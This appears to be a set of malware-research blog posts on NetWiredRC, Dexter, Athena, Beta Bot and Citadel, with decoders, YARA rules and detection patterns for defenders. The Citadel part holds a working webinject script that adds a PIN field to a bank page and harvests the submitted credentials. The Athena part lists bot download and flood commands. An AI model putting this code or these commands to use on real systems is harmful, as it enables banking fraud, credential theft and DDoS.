# 6404000 == disable_uac()
# 2244034 == AdlibRegister("anti_hook", 500)
# 3206254 == AdlibRegister("persistence", 500)
# 5378250 == startup()
# 1109091 == $sKey

This crypto key is used in Main to decrypt and run the file 20070.RQT:

decrypt and run 20070.RQT with cryptkey

The easiest way to decrypt this file was to simply let the script do the work. There’s a lot of code outside of functions though, so care has to be taken to remove everything non-crypto related. Remove the _RunPE() and replace it with

FileWrite($uniscriptdir & "DECRYPTED", $sArquive)

The decrypted file had 30/48 hits on VirusTotal when I scanned it (MD5: 224c73f8172123e5ddca2302425664a6). It's called NetWiredRC and is a remote access trojan made for stealing login information, likely in this case being used to steal Bitcoins. It connects to bitcoins.dd-dns.de on port 3360.

Some choice credential related strings from the decrypted malware:

%s\Thunderbird\profiles.ini
select * from moz_logins
%s\.purple\accounts.xml
Software\Microsoft\Internet Explorer\IntelliForms\Storage2

This free utility is nothing more than malware with very low detection rate being spammed to anyone that might have a Bitcoin sitting around. When I checked the domain with urlvoid it had zero ‘bad’ reports and was not blacklisted. I’ve since submitted the domain to multiple scanners and it’s now detected by Scumware.

On a recheck BitcoinAlarm.exe’s detection is up to 14 of 49 scanners, and the download link appears to return 404. bitcoins.dd-dns.de is no longer answering on port 3360.

Never before has it been so easy to leave cash accessible from the Internet, so expect more malware to make off with your Bitcoin wallet. Bitcoins that are not in use should be moved off into cold storage, or donated to the human fund at 136K8a5Mb8uDguFb7RnoXz7gzBSe2xaEED (ahem, worth a shot right?).

Happy Holidays: Point of Sale Malware Campaigns Targeting Credit and Debit Cards

By: cwilson -

Inside Recent Point-of-Sale Malware Campaign Activities

Curt Wilson, Dave Loftus, Matt Bing

An active Point of Sale (PoS) compromise campaign designed to steal credit and debit card data using the Dexter and Project Hook malware has been detected. Indicators of compromise will be provided for mitigation and detection purposes. Prior to the publication of this Threat Intelligence document (embedded at the end of this post), members of the FS-ISAC, major Credit Card vendors and law enforcement were notified.

It appears that there are at least three distinct versions of Dexter:

  1. Stardust (looks to be an older version, perhaps version 1)
  2. Millenium (note spelling)
  3. Revelation (two observed malware samples; has the capability to use FTP to exfiltrate data)

In early November 2013, ASERT researchers discovered two servers hosting Dexter and other PoS malware, including Project Hook. The Dexter campaign looks more active, especially in the Eastern Hemisphere, and is therefore the main focus herein. Dexter, first documented by Seculert in December 2012, is Windows-based malware used to steal credit card data from PoS systems. The exact method of compromise is not currently known; however, PoS systems suffer from the same security challenges as any other Windows-based deployment. Network and host-based weaknesses (such as default or weak credentials accessible over Remote Desktop, and open wireless networks that include a PoS machine), misuse, social engineering and physical access are likely candidates for infection. Additionally, the potential brittleness and obvious criticality of PoS systems may be a factor in the reportedly slow patch deployment process on PoS machines, which increases risk. Smaller businesses are likely an easier target due to reduced security. While the attackers may receive less card data from smaller retailers, infections may be more numerous and last longer due to the lack of security reporting and security staff in such environments.

Figure 1: Dexter (Purple) and Project Hook (Orange) infections in the Eastern Hemisphere


Figure 2: Dexter (Purple) and Project Hook (Orange) infections in the western hemisphere


For the full document, including a list of various compromise indicators and information about the back-end infrastructure, please download the full public report -

Dexter and Project Hook Break the Bank

 

Athena, A DDoS Malware Odyssey

By: Jason Jones -

The Athena malware family has existed for quite some time and appears to be the subject of a love/hate relationship based on posts in various "underground" forums. The original version was IRC-based, but earlier this year an HTTP-based version was released. While not as prevalent as other malware families, Athena has had a strong presence in our malware processing system for quite some time. This blog post will discuss its origins and DDoS capabilities, go over its latest evolution, and offer some details on how to identify it.

Athena’s IRC Origins

I first discovered Athena via a Pastebin post that showed an IRC log of someone ordering attacks via an IRC channel. Some googling and subsequent searching of our zoo for the patterns yielded a wide range of versions of Athena IRC. Many of these appeared to be used to install other malware rather than for DDoS. The majority of CnCs would put a few sets of initial commands in the IRC channel topic to order their bots to botkill, download other malware, attack a specific site, etc. Athena IRC also used a recognizable IRC nick format:

n[<country>|<privilege>|<desktop/laptop>|<OS version>|<architecture>|??][a-z]{8}

AthenaIRC 2.3.1 Manual Cover

Athena has been around for a number of years and is the product of a programmer who goes by the handle “_Stoner”. In the 1.X days of Athena IRC, builders were distributed, but these were cracked and posted online for anyone to use in botnet-building escapades without having to purchase them. Some of these cracked builders contained strings disparaging the quality of Athena and also referenced IPKiller (aka MP-DDOS) as being superior.

The 2.X versions saw this distribution model change, and _Stoner now controls the building and distribution of binaries for his customers. Judging from forum posts and the proliferation of various versions that we have seen come through our zoo, business seems to be going well. However, there are numerous complaints on some of the forums about _Stoner going into their IRC servers and channels and taking control of their botnets. He is quick to respond that this is not the case, but that does not appear to help his reputation in some of the underground communities. The version 2 series also saw a significant number of commands added: more DDoS commands, more password-stealing functionality, “IRC War” commands, file find and upload, etc. The bot also optionally features an “encrypted” IP option for the CnC that obfuscates the IP address by adding or subtracting a static value from each octet of the IP, depending on whether the octet falls in the top or bottom half of the valid octet range. This feature was observed in our sandboxing system many times where a CnC hostname pointed to one IP, but a different IP was then connected to for CnC – quite confusing initially, but easy to spot once we found out some of the binaries had this feature. Athena also has encrypted commands that simply use a lookup table to find an index into a keyring and then a secondary lookup to get the decrypted character.

The pricing structure for 2.3.1 is $100 for one build, $10 to rebuild or update, $15 to have _Stoner setup your IRC, and $130 for a ready-made IRC channel that is “capable of holding 20k bots” and one build.

Athena, Goddess of IRC War?

Not quite :) When I first started reversing Athena IRC, I felt like I was Daedalus trying to navigate the Labyrinth. I finally found my way to an exit and avoided the Minotaur whilst discovering where the DDoS commands were processed.

Athena IRC Command Parsing

Athena offers many DDoS attacks, including standard HTTP GET/POST floods, UDP flood, RUDY, Slowloris, Slowpost, ARME, HTTP flood via hidden browser, bandwidth floods and an established-connection flood attack. The attacks perform as advertised, but, unlike other DDoS bots, only one attack at a time can be carried out. This severely limits its ability to compete in the underground DDoS-for-hire marketplace with other bots like Madness, Drive, and DirtJumper.

For its HTTP-based attacks, Athena uses one subroutine to construct the HTTP request template. Random numbers are generated, and if they are above or below certain values then different values are selected for the header; in some cases the randomly generated value is used to determine whether or not to include a header at all. The image below illustrates the possible headers that are included and the potential values for those that are. Green means the value is selected based on which attack is ordered, values in black are always included, headers in blue are randomly included, and the red values are the values from which the final header value is selected.

Athena HTTP Request Building

Athena Moves to HTTP

The HTTP version of Athena first popped onto my radar in late March of this year when Exposed Botnets covered it for the first time, but I was not able to locate any samples at the time. Fast forward a few weeks and many samples started flowing our way.

The command and control protocol for Athena HTTP is fairly interesting. There are three parameters – a, b and c – that are sent with the POST request to the CnC. The a parameter is a fully URL-encoded base64 string that provides a colon-separated string translation table. The string translation table is applied to the b parameter, which is another base64 string – this time not URL-encoded – and the result is then base64-decoded to yield the phone-home data of the bot; c is used as a data marker on the response from the server. The initial phone-home format string is below, where gend is the “gender” (laptop, desktop, etc.), ver is the Athena HTTP version installed, net is the .NET version installed, and the rest are fairly self-explanatory.

  |type:on_exec|uid:%s|priv:%s|arch:x%s|gend:%s|cores:%i|os:%s|ver:%s|net:%s|

Subsequent phone-homes use the following format string. The bk_ fields carry “botkill” data, and busy signifies whether or not the bot is busy with a command.

  |type:repeat|uid:%s|ram:%ld|bk_killed:%i|bk_files:%i|bk_keys:%i|busy:%s|

The server applies the string translation table sent by the bot to the set of newline-separated, base64-encoded commands before adding the data marker to the front of the string. Without the original phone-home from the bot, this makes determining the commands sent by the CnC extremely difficult. The commands sent by the CnC are pipe-delimited, with taskid=<task id> in the first part and command=<command> in the second part.

The commands actually follow the exact same structure as the IRC version and the same parsing method is used once the command is extracted and some examples are presented below:

|taskid=120|command=!ddos.layer4.udp <target-site> <port> <time>|
|taskid=115|command=!ddos.http.bandwidth <target-url> <port> <time>|
|taskid=37|command=!download <target-url> 1|

A script to decode the phone-home and display commands is included in the ASERT GitHub repository.
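The following decoder is an added example written for this post; it is not the ASERT script. It assumes the translation table is laid out as "SRC:DST" (each character of SRC in the b parameter stands for the character at the same index of DST) and that the server applies the table in the SRC-to-DST direction to its command lines, so the analyst undoes the response with the inverse; the traffic it decodes is constructed, not a capture.

```python
import base64
import urllib.parse

# Each half of a table must be a permutation of the base64 alphabet plus '=' padding;
# this constant is only used to build the constructed sample traffic below.
B64_CHARS = ("ABCDEFGHIJKLMNOPQRSTUVWXYZ"
             "abcdefghijklmnopqrstuvwxyz0123456789+/=")


def parse_table(a_param):
    """'a' = URL-encoded base64 of "SRC:DST" (assumed layout); return (src, dst)."""
    raw = base64.b64decode(urllib.parse.unquote(a_param)).decode("ascii")
    src, dst = raw.split(":", 1)
    if len(src) != len(dst) or len(set(src)) != len(src) or len(set(dst)) != len(dst):
        raise ValueError("malformed translation table")
    return src, dst


def parse_fields(text, sep):
    """Split '|key<sep>value|...|' into a dict; phone-homes use ':' and commands use '='."""
    fields = {}
    for part in text.strip("|").split("|"):
        key, found, value = part.partition(sep)
        if not found:
            raise ValueError("field without separator %r: %r" % (sep, part))
        fields[key] = value
    return fields


def decode_phone_home(a_param, b_param):
    """Apply the table to 'b', base64-decode it and return the phone-home fields."""
    src, dst = parse_table(a_param)
    plain = base64.b64decode(b_param.translate(str.maketrans(src, dst)))
    return parse_fields(plain.decode("ascii"), ":")


def decode_commands(a_param, c_marker, body):
    """Strip the data marker, then decode each newline-separated command line
    with the inverse table (assumption: the server applied SRC->DST)."""
    if not body.startswith(c_marker):
        raise ValueError("response does not start with the data marker")
    src, dst = parse_table(a_param)
    inverse = str.maketrans(dst, src)
    commands = []
    for line in body[len(c_marker):].split("\n"):
        if not line:
            continue
        plain = base64.b64decode(line.translate(inverse)).decode("ascii")
        fields = parse_fields(plain, "=")
        commands.append((int(fields["taskid"]), fields["command"]))
    return commands


def build_sample_exchange():
    """Constructed traffic (not a capture): a 7-position rotation of the
    alphabet serves as the table; the command strings follow the post's examples."""
    src, dst = B64_CHARS, B64_CHARS[7:] + B64_CHARS[:7]
    a_param = urllib.parse.quote(
        base64.b64encode((src + ":" + dst).encode("ascii")).decode("ascii"), safe="")
    phone = ("|type:on_exec|uid:bot-0001|priv:admin|arch:x86|gend:desktop"
             "|cores:2|os:Windows 7|ver:1.0|net:4.0|")
    b_param = base64.b64encode(phone.encode("ascii")).decode("ascii").translate(
        str.maketrans(dst, src))                     # the bot applies DST->SRC
    c_marker = "#MARK#"                              # constructed data marker
    cmds = ["|taskid=120|command=!ddos.layer4.udp example.invalid 80 60|",
            "|taskid=37|command=!download http://example.invalid/x.exe 1|"]
    forward = str.maketrans(src, dst)
    body = c_marker + "\n".join(
        base64.b64encode(c.encode("ascii")).decode("ascii").translate(forward)
        for c in cmds) + "\n"
    return a_param, b_param, c_marker, body


if __name__ == "__main__":
    a, b, c, body = build_sample_exchange()
    print(decode_phone_home(a, b))
    for task_id, command in decode_commands(a, c, body):
        print(task_id, command)
```

Because the table travels only in the bot's request, a response captured on its own cannot be decoded; keep the request and response of a session together when collecting evidence.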

Athena Commands Her DDoS Army

Some careless botnet admins left archives of their control panels floating around on their CnCs which greatly sped up my reverse engineering of how the Athena HTTP binaries were operating. The server-side PHP code has a decent amount of obfuscation, but it is not terribly difficult to bypass. The screenshots below show the stages of deobfuscation that I went through when recovering to readable PHP code:

The panel isn’t anything flashy, but is quite usable and shows the state of all bots and commands. I fired up an internal version of the control panel to experiment with and the results are below (please note: these are not real commands, all fake):

Athena, Beyond DDoS

Athena HTTP shares the previously described weakness of only being able to carry out one attack at a time and has not been observed to be nearly as active in the DDoS space as other bots monitored by ASERT. This raises the question of what it is used for. One of the most popular uses that we have observed on the CnCs that we monitor is as a pay-per-install (PPI) botnet. Over the last 6 months, we have collected over 150 new executables by monitoring which URLs the bots were told to download. A timeline graph is shown below; unlabeled yellow dots are samples that were unidentified by our tagging system and also did not exist on VirusTotal at the time of initial processing. Many of these turned out to be Bitcoin/Litecoin/etc. miners, while others were password-stealing applications. Apologies for the overlap on names, but it was extremely difficult to get them any less overlapped due to the high volume during a few short periods where people appeared to be testing out their new botnets :). The large gap from late August through early October was due to a slight change in identification that caused our monitoring system to miss new samples and is not necessarily reflective of new malware not getting dropped.

Athena HTTP Dropped Malware Timeline

Athena’s Achilles Heel

Easy identification via multiple means. The easily identifiable IRC nicks and recognizable HTTP POSTs discussed previously make detection on the network easy, but there are also many other ways to identify both versions of this malware. Athena – both IRC and HTTP – typically uses mutexes that match (UPDATE_|BACKUP_|MAIN_)-?[0-9]{10} (great for finding samples on malwr.com via a mutex: search) and additionally has many easily identifiable strings depending on the version. One yara rule is presented below that catches many, but not all, versions of the IRC version, and another rule that has so far detected all of the HTTP versions we have seen is also presented – these are also available in the Arbor GitHub repository. The Microsoft Security Essentials engine identifies the IRC and early versions of Athena HTTP as Trojan:Win32/Squida.A, but has more recently started identifying Athena HTTP as Trojan:Win32/Folyris.A.


rule athena_http {
  meta:
    author = "Jason Jones <jasonjones@arbor.net>"
    description = "Athena HTTP identification"
  strings:
    $fmt_str1 = "|type:on_exec|uid:%s|priv:%s|arch:x%s|gend:%s|cores:%i|os:%s|ver:%s|net:%s|"
    $fmt_str2 = "|type:repeat|uid:%s|ram:%ld|bk_killed:%i|bk_files:%i|bk_keys:%i|busy:%s|"
    $cmd1 = "filesearch.stop"
    $cmd2 = "rapidget"
    $cmd3 = "layer4."
    $cmd4 = "slowloris"
    $cmd5 = "rudy"
  condition:
    all of ($fmt_str*) and 3 of ($cmd*)
}
rule athena_irc {
  meta:
    author = "Jason Jones <jasonjones@arbor.net>"
    description = "Athena IRC v1.8.x, 2.x identification"
  strings:
    $cmd1 = "ddos." fullword
    $cmd2 = "layer4." fullword
    $cmd3 = "war." fullword
    $cmd4 = "smartview" fullword
    $cmd5 = "ftp.upload" fullword
    $msg1 = "%s %s :%s LAYER4 Combo Flood: Stopped"
    $msg2 = "%s %s :%s IRC War: Flood started [Type: %s | Target: %s]"
    $msg3 = "%s %s :%s FTP Upload: Failed"
    $msg4 = "Athena v2"
    $msg5 = "%s %s :%s ECF Flood: Stopped [Total Connections: %ld | Rate: %ld Connections/Second]"
    // v1 strs
    $amsg1 = "ARME flood on %s/%s:%i for %i seconds [Host confirmed vulnerable"
    $amsg2 = " Rapid HTTP Combo flood on %s:%i for %i seconds"
    $amsg3 = "Began flood: %i connections every %i ms to %s:%i"
    $amsg4 = "IPKiller>Athena"
    $amsg5 = "Athena=Shit!"
    $amsg6 = "Athena-v1"
    $amsg7 = "BTC wallet.dat file found"
    $amsg8 = "MineCraft lastlogin file found"
    $amsg9 = "Process '%s' was found and scheduled for deletion upon next reboot"
    $amsg10 = "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)"
    // Athena-v1.8.3
    $amsg11 = "Rapid Connect/Disconnect"
    $amsg12 = "BTC wallet.dat found,"
    // v1 cmds
    $acmd1 = ":!arme"
    $acmd2 = ":!openurl"
    $acmd3 = ":!condis"
    $acmd4 = ":!httpcombo"
    $acmd5 = ":!urlblock"
    $acmd6 = ":!udp"
    $acmd7 = ":!btcwallet"
  condition:
    (all of ($cmd*) and 3 of ($msg*)) or (5 of ($amsg*) and 5 of ($acmd*))
}
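Alongside the yara rules, the nick layout given in the "Athena’s IRC Origins" section and the mutex pattern quoted above can be turned into host and network log checks. This is an added example, not Arbor's code; the field alphabets it assumes for the nick (two-letter country, a word for the privilege, x86/x64 for the architecture) are assumptions, since the post gives only the layout, and the log lines it scans are constructed.

```python
import re

# Nick layout from the post: n[<country>|<privilege>|<desktop/laptop>|<OS version>|<architecture>|??][a-z]{8}
# The per-field alphabets are assumptions; the post shows only the layout.
NICK_RE = re.compile(
    r"\bn\[(?P<country>[A-Z]{2})\|(?P<priv>[A-Za-z]+)\|(?P<gend>desktop|laptop)\|"
    r"(?P<os>[^|\]]+)\|(?P<arch>x(?:86|64))\|(?P<extra>[^\]]*)\](?P<rand>[a-z]{8})\b"
)
# Mutex pattern exactly as quoted in the post.
MUTEX_RE = re.compile(r"\b(?:UPDATE_|BACKUP_|MAIN_)-?[0-9]{10}\b")


def parse_nick(nick):
    """Return the nick's fields as a dict, or None if it is not an Athena IRC nick."""
    m = NICK_RE.fullmatch(nick)
    return m.groupdict() if m else None


def scan_lines(lines):
    """Return (line_no, kind, match) for every Athena nick or mutex seen in the lines."""
    hits = []
    for n, line in enumerate(lines, 1):
        for m in NICK_RE.finditer(line):
            hits.append((n, "irc_nick", m.group(0)))
        for m in MUTEX_RE.finditer(line):
            hits.append((n, "mutex", m.group(0)))
    return hits


# Constructed sample lines: two IRC log lines, three sandbox mutex records, one benign line.
SAMPLE_LINES = [
    ":n[US|admin|desktop|7|x86|??]qwertyui JOIN #bots",
    "irc.example.invalid 353 n[DE|user|laptop|XP|x64|??]abcdefgh",
    "sandbox: CreateMutexA name=MAIN_1234567890",
    "sandbox: CreateMutexA name=BACKUP_-0987654321",
    "user nick[1] joined",
    "sandbox: CreateMutexA name=UPDATE_123",   # too short: must not match
]

if __name__ == "__main__":
    for line_no, kind, match in scan_lines(SAMPLE_LINES):
        print(line_no, kind, match, parse_nick(match) if kind == "irc_nick" else "")
```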

Related MD5:


Beta Bot – A Code Review

By: Kenny MacDermid -

Introduction

The basics of Beta Bot were covered by Limor Kessem on the RSA blog, including a quick feature summary.

Unlike Mrs. Kessem’s conclusion, I wouldn’t classify Beta Bot as a banking trojan. To me it’s a banking trojan only in the same way a keylogger is a banking trojan. It does contain code to grab POSTed forms, but as the blog post mentions there’s no code to inject JavaScript into web pages, and nothing that would bypass a bank’s two-factor authentication. Plus, on the “Form grabber” configuration page is the warning: “* Banking fraud is not condoned. We discourage you from committing any type of fraud with this feature.” Who wouldn’t listen to that?

Beta Bot sales are being handled by “Lord Huron,” although “betamonkey” appears to be the author.

In this post, I hope to cover how Beta Bot uses encryption, how it stores its configuration, and provide a tool to extract it. The code is available in our GitHub repository and works with some raw files and memory dumps from Beta Bot versions 1.0.2.5 and 1.5.

Hashed APIs

Using hashes to hide the actual imports is a fairly common malware trick. Beta Bot uses the Adler-32 (http://en.wikipedia.org/wiki/Adler-32) algorithm and hashes the string dll_name + "." + function_name.


The DLL names are stored in the binary so it’s easy to iterate all the exports to create the hashes. The code links certain hashes to certain DLLs, but even without following the code you get only a couple of collisions, and it’s pretty clear which the correct function is.

Included in GitHub is a script to set the correct names for new samples.
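The resolver below is an added example, not the GitHub script. It writes out Adler-32 so the hashing step is visible, cross-checks it against zlib, hashes dll_name + "." + function_name as the post describes, and keeps every (DLL, export) pair behind a hash so the collisions mentioned above stay visible; lower-case DLL names and the export lists are assumptions.

```python
import zlib

MOD_ADLER = 65521  # largest prime below 2**16


def adler32(data):
    """Reference Adler-32: a = 1 + sum of bytes, b = sum of successive a values,
    both mod 65521; the result is (b << 16) | a."""
    a, b = 1, 0
    for byte in data:
        a = (a + byte) % MOD_ADLER
        b = (b + a) % MOD_ADLER
    return (b << 16) | a


def matches_zlib(data):
    """Cross-check the reference implementation against zlib's."""
    return adler32(data) == (zlib.adler32(data) & 0xFFFFFFFF)


def betabot_api_hash(dll_name, function_name):
    """Hash of dll_name + "." + function_name, as the post describes
    (lower-case DLL names are an assumption)."""
    return adler32((dll_name + "." + function_name).encode("ascii"))


def build_hash_table(exports_by_dll):
    """Map each hash to every (dll, function) pair that produces it, so
    collisions stay visible rather than overwriting one another."""
    table = {}
    for dll, functions in exports_by_dll.items():
        for func in functions:
            table.setdefault(betabot_api_hash(dll, func), []).append((dll, func))
    return table


def resolve_hashes(table, hashes):
    """Resolve hashes pulled from a sample; unknown hashes map to []."""
    return {h: table.get(h, []) for h in hashes}


# Constructed export lists; a real resolver walks the export tables of the DLLs.
SAMPLE_EXPORTS = {
    "kernel32.dll": ["CreateFileA", "CreateFileW", "LeaveCriticalSection", "VirtualAlloc"],
    "advapi32.dll": ["CryptAcquireContextA", "RegOpenKeyExA"],
    "ws2_32.dll": ["WSAStartup", "connect", "send", "recv"],
}

if __name__ == "__main__":
    table = build_hash_table(SAMPLE_EXPORTS)
    wanted = [betabot_api_hash("kernel32.dll", "LeaveCriticalSection"), 0xDEADBEEF]
    for h, names in resolve_hashes(table, wanted).items():
        print("0x%08x -> %s" % (h, names or "unresolved"))
```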

Hidden Code

Beta Bot uses multiple layers of cryptography. The code that decrypts the configuration data is itself encrypted and stored in the binary. This hidden code is 550 bytes. The code verifies that the XOR of the last two bytes of the encrypted code is 0x63. It’s encrypted with RC4 using the hardcoded key 1E82B25C33.

This code is decrypted and started in a new thread with the address of the encrypted configuration and the encryption key passed in:


Using the crypto key the global configuration structure is decrypted using RC4 and pointers are set in the global main structure/class.

The inside_crypto_key is used to decrypt the configuration and is set up in the main global structure early in the bot setup. It points to a block of 32 bytes in the .data section. Inside the hidden code, every second byte is used to build the real key used to decrypt the encrypted configuration. The rest of the bytes appear unused.


Global_config_struct points to a block of encrypted data in the .rdata section. In version 1.0.2.5 of the code the length of a configuration is 0x2ace, in version 1.5 this has shrunk to 0xd46.
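The steps described in this section (the XOR check on the hidden code, the key built from every second byte of the 32-byte block, and the RC4 decryption of a configuration of the per-version length) are modelled in the added example below. It is not Beta Bot's code or the extraction script: RC4 is the textbook algorithm, taking the even offsets of the key block is an assumption (the post says only "every second byte"), and the sample it decrypts is constructed.

```python
HIDDEN_CODE_KEY = bytes.fromhex("1E82B25C33")          # hardcoded RC4 key quoted in the post
HIDDEN_CODE_LEN = 550                                    # size of the hidden code, per the post
CONFIG_LENGTHS = {"1.0.2.5": 0x2ACE, "1.5": 0xD46}       # per-version config sizes from the post


def rc4(key, data):
    """Textbook RC4 (KSA then PRGA); encryption and decryption are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def hidden_code_looks_valid(encrypted_code):
    """The bot's sanity check: XOR of the last two encrypted bytes must be 0x63."""
    return len(encrypted_code) >= 2 and (encrypted_code[-1] ^ encrypted_code[-2]) == 0x63


def decrypt_hidden_code(encrypted_code):
    """Decrypt the 550-byte hidden decryptor with the hardcoded key, after the XOR check."""
    if not hidden_code_looks_valid(encrypted_code):
        raise ValueError("hidden code failed the 0x63 check")
    return rc4(HIDDEN_CODE_KEY, encrypted_code)


def derive_config_key(key_block):
    """16-byte RC4 key from every second byte of the 32-byte inside_crypto_key block
    (starting at offset 0 is an assumption)."""
    if len(key_block) != 32:
        raise ValueError("inside_crypto_key block must be 32 bytes")
    return bytes(key_block[0::2])


def decrypt_config(key_block, encrypted_config, version):
    """Decrypt a configuration blob of the length the post gives for that version."""
    expected = CONFIG_LENGTHS[version]
    if len(encrypted_config) != expected:
        raise ValueError("expected 0x%x bytes for version %s" % (expected, version))
    return rc4(derive_config_key(key_block), encrypted_config)


def build_sample(version="1.5"):
    """Constructed stand-in for a sample: a fake config padded to the version's
    length and encrypted with a key derived from a constructed 32-byte block."""
    key_block = bytes((i * 37 + 11) & 0xFF for i in range(32))
    config = b"|constructed-config|owner:test|cnc:example.invalid|"
    config = config.ljust(CONFIG_LENGTHS[version], b"\x00")
    return key_block, rc4(derive_config_key(key_block), config)


if __name__ == "__main__":
    key_block, encrypted = build_sample("1.5")
    print(decrypt_config(key_block, encrypted, "1.5").rstrip(b"\x00"))
```

On a real dump the key block and the encrypted configuration still have to be located first, which is what the offset and brute-force searches described below do.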

Configuration Structure Layout

Once decrypted, the configuration file contains a header with a unique ID of the purchaser of the bot, a couple of strings that are used for the rootkit install, and 16 CnC blocks.

Each CnC block contains a domain, path, and port, an option specifying if SSL should be used, the number of attempts that should be made, and the keys used for encrypting the communication. There are also checksum values, but I don’t plan to discuss them as to not make the creation of a builder too easy.

Configuration Extraction Tool

Located on Github is a script created to pull the encrypted configuration out of binaries or memory dumps. It works with version 1.0.2.5 and version 1.5 of Beta Bot using a couple of techniques to find the configuration. If the sample is packed with a packer that obfuscates either the .data or .rdata sections this tool will not work on the raw sample and memory dumps will have to be used.

For creating memory dumps, it’s useful to automatically create a dump on calls to LeaveCriticalSection. Beta Bot creates multiple threads and uses critical sections for synchronization. LeaveCriticalSection is called at the end of the decryption code.

The instructions posted by r3shl4k1sh can also be used to manually find the configuration data.

When the script finds a valid configuration it will output the information in the form:


Script search techniques:

Offset Search

First, the script searches a small area of the .data and .rdata sections for valid keys and configurations. This has been shown to work well in our testing and is very fast, generally taking less than a second.

Bruteforce Search

Second, the script creates an index of all possible 6-byte sequences and searches every possible key. The index requires memory of around 220 times the size of the file, and the time required to search is also much larger. Searching a 1 MB file takes about 20 seconds.

Results

The script was run on available samples and 387 configs were found. The complete list with encryption keys is available here.


Citadel’s Man-in-the-Firefox: An Implementation Walk-Through

By: Dennis Schwarz -

While banking malware or “bankers” have a lot of functionality, they are defined by their Man-in-the-Browser (MITB) implementation. This mechanism allows them to not only steal banking usernames and passwords, but to also inject arbitrary content into banking websites in order to social engineer and try and steal additional credentials such as identifying information, pins, and token codes.

The paper below will walk through Citadel’s MITB implementation for the Firefox web browser. Citadel was chosen as the malware of interest because at the time of writing it was one of the main banking trojans being used in the wild. Even after Microsoft’s Operation b54 which took down more than 1,400 Citadel botnets, the malware is alive and well and being used by distinct threat actors to target various countries and their associated financial sectors. The focus will be on Firefox because it is an easier target to walk through, but the concepts can be extrapolated to (and have been implemented for) other browsers–Internet Explorer, Opera, and some versions of Chrome.

Since its arrival sometime in early 2012, there has been a lot of good analysis of Citadel as a whole, but it doesn’t venture very deeply into the MITB functionality. Likewise, there have been a lot of good write-ups and proof-of-concept code for MITB techniques, but they have usually stopped short of showing in-the-wild, malicious implementations. The goal of this paper is to help bridge that gap.

More specifically, this paper shows how Citadel modifies a benign banking website like this:

[Figure citadel_mitb1: the benign banking website]

to a malicious version:

[Figure citadel_mitb2: the same website after Citadel’s injection]

so that the operators can harvest banking credentials from innocent victims:

[Figure citadel_mitb3: the harvested banking credentials]

Techniques like MITB are making “bankers” incredibly deft at their craft, infecting and affecting a large number of people and companies across the world. The more these tactics are understood, the better they can be protected against.
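The page-modification step described above, as an added example that is not code from the white paper or from Citadel itself: the rules below are written in the ZeuS-family “webinject” config grammar (set_url / data_before / data_inject / data_after / data_end) that Citadel inherited, and the functions apply one such rule to a captured response body the way an MITB hook rewrites the HTML before the browser renders it, then pick the injected field out of the victim’s subsequent POST. The in-process hooking of the browser’s network functions that the paper walks through is not reproduced here. The config text, the bank HTML, the hostname bank.example and every field name are constructed for illustration, not indicators from the paper.

```javascript
// Added example (not from the white paper): apply a ZeuS-family webinject
// rule to a page body and harvest the injected field from the POST.
// All inputs below are constructed; bank.example is a placeholder host.

const INJECT_CONFIG = `
set_url https://bank.example/login* GP
data_before
name="password">
data_end
data_inject
<label>ATM PIN <input type="text" name="pin"></label>
data_end
data_after
<input type="submit"
data_end
`;

// Constructed stand-in for the benign banking page.
const BANK_LOGIN_HTML = [
  '<form method="post" action="/login">',
  '<input type="text" name="user">',
  '<input type="password" name="password">',
  '<input type="submit" value="Sign in">',
  '</form>',
].join('\n');

// Parse the set_url / data_* / data_end grammar into rule objects.
function parseWebinjects(text) {
  const rules = [];
  let rule = null;
  let section = null;
  for (const raw of text.split('\n')) {
    const line = raw.trim();
    if (line.startsWith('set_url ')) {
      const parts = line.split(/\s+/);
      // flags: G = apply to GET responses, P = apply to POST responses
      rule = { urlMask: parts[1], flags: parts[2] || 'GP', before: [], inject: [], after: [] };
      rules.push(rule);
      section = null;
    } else if (line === 'data_before' || line === 'data_inject' || line === 'data_after') {
      section = line.slice('data_'.length);
    } else if (line === 'data_end') {
      section = null;
    } else if (rule && section !== null && line !== '') {
      rule[section].push(raw);
    }
  }
  return rules.map((r) => ({
    urlMask: r.urlMask,
    flags: r.flags,
    before: r.before.join('\n').trim(),
    inject: r.inject.join('\n').trim(),
    after: r.after.join('\n').trim(),
  }));
}

// set_url masks use '*' as a wildcard; everything else is literal.
function maskToRegExp(mask) {
  const escaped = mask.replace(/[.+?^${}()|[\]\\]/g, '\\$&').replace(/\*/g, '.*');
  return new RegExp('^' + escaped + '$');
}

// Rewrite the response body: the text between data_before and data_after
// is replaced by data_inject; with no data_after, inject goes right after
// data_before. Returns the new body and how many rules fired.
function applyWebinjects(rules, method, url, html) {
  let out = html;
  let applied = 0;
  for (const rule of rules) {
    if (!rule.flags.includes(method[0].toUpperCase())) continue;
    if (!maskToRegExp(rule.urlMask).test(url)) continue;
    const start = out.indexOf(rule.before);
    if (start < 0) continue;
    const insertAt = start + rule.before.length;
    let end = insertAt;
    if (rule.after) {
      end = out.indexOf(rule.after, insertAt);
      if (end < 0) continue;
    }
    out = out.slice(0, insertAt) + '\n' + rule.inject + '\n' + out.slice(end);
    applied += 1;
  }
  return { html: out, applied };
}

// The victim submits the form to the real bank; the hook on the outgoing
// request reads the urlencoded body and keeps the fields the operator wants.
function harvestFormPost(body, wanted) {
  const params = new URLSearchParams(body);
  const grabbed = {};
  for (const name of wanted) {
    if (params.has(name)) grabbed[name] = params.get(name);
  }
  return grabbed;
}

// Stand-alone demo with the constructed inputs.
const rules = parseWebinjects(INJECT_CONFIG);
const page = applyWebinjects(rules, 'GET', 'https://bank.example/login?lang=en', BANK_LOGIN_HTML);
console.log(page.html);
console.log(harvestFormPost('user=alice&password=hunter2&pin=1234', ['user', 'password', 'pin']));
```

The two anchors are why the injected field lands in the real form and is posted to the real bank over the bank’s own TLS session: nothing on the wire or in the server logs distinguishes the extra field from a legitimate submission, which is the point of doing the injection inside the browser rather than on the network.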

For the full white paper (PDF) please click here.


Taking on the biggest challenges and welcoming Packetloop

By: klamb -

